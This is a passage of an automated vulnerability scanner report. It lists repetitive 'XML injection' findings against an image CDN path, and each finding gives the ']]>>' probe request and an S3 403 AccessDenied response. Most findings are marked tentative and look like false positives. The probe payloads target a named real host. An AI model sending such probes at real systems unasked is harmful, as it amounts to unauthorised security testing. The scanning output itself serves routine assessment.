The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-993333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 8BAFF9D3467A1D57
x-amz-id-2: YpbPjTvjQ3mEOoIdY8uRUFw5CseQjDHp3Nvt+8Gu1W/QHZAYOE5Zwxy26FeysXIU
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 4e07b71697d1f340f0959032f040fefc49dc36070d0b4f753cadf8a90fdff71b2d9c0c21e90512e1
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>8BAFF9D3467A1D57</RequestId><HostId>YpbPjTvjQ3mEOoIdY8uRUFw5CseQjDHp3Nvt+8Gu1W/QHZAYOE
...[SNIP]...

8.108. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-993333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 3E190A0E74D9C09A
x-amz-id-2: CK0van+J+Ir7ejK417navPUxItMrvU5M1Rt4nCHnqoEM8nfMrkouiK+f8C45niTt
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:14 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f8abc0e4a76c636f20219f427f54fb7a12e2ecaf95230e1b5f9fdabeabfaac084db5eed20523dfe5
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>3E190A0E74D9C09A</RequestId><HostId>CK0van+J+Ir7ejK417navPUxItMrvU5M1Rt4nCHnqoEM8nfMrk
...[SNIP]...

8.109. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 522DF9013F7C1318
x-amz-id-2: oISnN83tsh96kgdYTj/j3Rvwz6heb5IyiHcXo71gyPWhRfyggCEAzHdpRSKleaJF
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:19 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 8385d58f941464442d2d2688aa73cefece2537c737c81ab04b8e2063066317bcfa6cb4f17d3eb6cd
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>522DF9013F7C1318</RequestId><HostId>oISnN83tsh96kgdYTj/j3Rvwz6heb5IyiHcXo71gyPWhRfyggC
...[SNIP]...

8.110. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-993333-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 5E949AB4B11A6E68
x-amz-id-2: fbb5bvpHp+AuSmHz4GzFDGmcBr5Pa2WX8kztyYlXiKljHJvYWllGmhvx5VTNeTEH
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:06 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: cd76b6f34d8858800e36d3d1490bdc0764604f9a469a5ddc305fc340233af6c474de77c8a6bd6083
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5E949AB4B11A6E68</RequestId><HostId>fbb5bvpHp+AuSmHz4GzFDGmcBr5Pa2WX8kztyYlXiKljHJvYWl
...[SNIP]...

8.111. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-993333-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 60592F3EDEB79511
x-amz-id-2: vlBhHQ1fnHVJFT+sRrAc82Q9tyGrMseT5BqpgeB4IC/1BO62aIQnR5YFERrgP+7w
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:14 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: c1d261677678a28606330d3b4f655b4410b79bcd15efd16ed7efe01d848799f7d9b99b704e15dedc
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>60592F3EDEB79511</RequestId><HostId>vlBhHQ1fnHVJFT+sRrAc82Q9tyGrMseT5BqpgeB4IC/1BO62aI
...[SNIP]...

8.112. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-993333-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: DC2FE9B864B55911
x-amz-id-2: J/Wy7rxA/WSRSXQLcq8s6ruH5FVpXo64VRSkecvYm8Lyx9DhLyRMDXgO7XXt7hmx
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:20 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 34677d1344794b470439912656d9c519f9313ea3db3cd6e537b9c36a08c7052c30df9f962f1060c1
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>DC2FE9B864B55911</RequestId><HostId>J/Wy7rxA/WSRSXQLcq8s6ruH5FVpXo64VRSkecvYm8Lyx9DhLy
...[SNIP]...

8.113. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: C87A72C21066702E
x-amz-id-2: Ax/81E3dz4DiaGq9siwPzxRKUL+QSsyhM+mNlcf9PBDXNJNCBSgJqu8OTlUdJdpJ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:26 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 3e78ca52bd16311b4f14aa8fc9f7736680831187985ee2c8275d733283dff6cff071ca562ee8e581
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>C87A72C21066702E</RequestId><HostId>Ax/81E3dz4DiaGq9siwPzxRKUL+QSsyhM+mNlcf9PBDXNJNCBS
...[SNIP]...

8.114. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-cc3333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 13BB4A353E49315A
x-amz-id-2: 8UfyZ0YAFc2I9kum2o+c5YMNfG3LNW9ygPHjSDKwclWOLHnterHjLF3Bea2k1QJA
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:58 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 07a11db9d301ab6bf10bdc6d682bd29face394ba538d66b54a151079057752931c303efc54a491fe
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>13BB4A353E49315A</RequestId><HostId>8UfyZ0YAFc2I9kum2o+c5YMNfG3LNW9ygPHjSDKwclWOLHnter
...[SNIP]...

8.115. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-cc3333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 5EEE81428B4B2039
x-amz-id-2: xTUy4mX8BfoTOIteCVai648AbrovgypLX87KqEiPD0u712N318xhQHW0Sz7T41Q7
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:08 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: b6fe52fee06eefc06585c40911749882e18fb07143a084b42af1d0b95587ee801e92dc2dd707a6ff
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5EEE81428B4B2039</RequestId><HostId>xTUy4mX8BfoTOIteCVai648AbrovgypLX87KqEiPD0u712N318
...[SNIP]...

8.116. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-cc3333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4D26063BF8FA7B0B
x-amz-id-2: 7O1AtTgu4M6wTVTVZOE2uDmL3Q93k8l1D+AKyD3NoGv72FIGSjSd+Q0SFTO2rzhm
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:23 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: bc96c08db2ccd7e91859aba23cfc7c58824ac62f729ce068e941c4860ecdc1c8a927db679c5e2164
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4D26063BF8FA7B0B</RequestId><HostId>7O1AtTgu4M6wTVTVZOE2uDmL3Q93k8l1D+AKyD3NoGv72FIGSj
...[SNIP]...

8.117. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F4898166960B9D11
x-amz-id-2: Cb9FRaEbsRY54i+fpy7l4dExWqT8oyYpNFQEN0Ge8Eo5Rm7CzDrKg8ovtJuvZN89
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:28 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 164e7cbacd34776c092bfcbbd1b1184e424336b9ff12fe5a519832cdff5c08f00c3834012e67cdf1
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F4898166960B9D11</RequestId><HostId>Cb9FRaEbsRY54i+fpy7l4dExWqT8oyYpNFQEN0Ge8Eo5Rm7CzD
...[SNIP]...

8.118. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-cc3333-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: B4E6F9E0F157F60D
x-amz-id-2: 8IJBD8fK6J/3WlwZ3vD3FqGsU5+rXl3LFhfjuxDImjE5fFnODk1tdpGQrknS7kiX
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:13 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: fa904438d0c850b8dd6bc647f2bcd0276c796b4f046504eaecb6bb9512161f34c3d8d846f971c454
Via: 1.0 d5ba42a2d3d506b64c73b6035a0a9f60.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>B4E6F9E0F157F60D</RequestId><HostId>8IJBD8fK6J/3WlwZ3vD3FqGsU5+rXl3LFhfjuxDImjE5fFnODk
...[SNIP]...

8.119. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-cc3333-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: AD0D2B1EC367C6FF
x-amz-id-2: aTCSDf62X2oPeNg9XEufIFenbzK+lW/toib+Tqse89Tk2bBsR8OpUGvZMIdyQ1H6
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:18 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: bf39725ff52e8bd00c36f281ad6c45831e20a21995afc0d09015cbdf1d9492e25923599c0d22caec
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AD0D2B1EC367C6FF</RequestId><HostId>aTCSDf62X2oPeNg9XEufIFenbzK+lW/toib+Tqse89Tk2bBsR8
...[SNIP]...

8.120. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

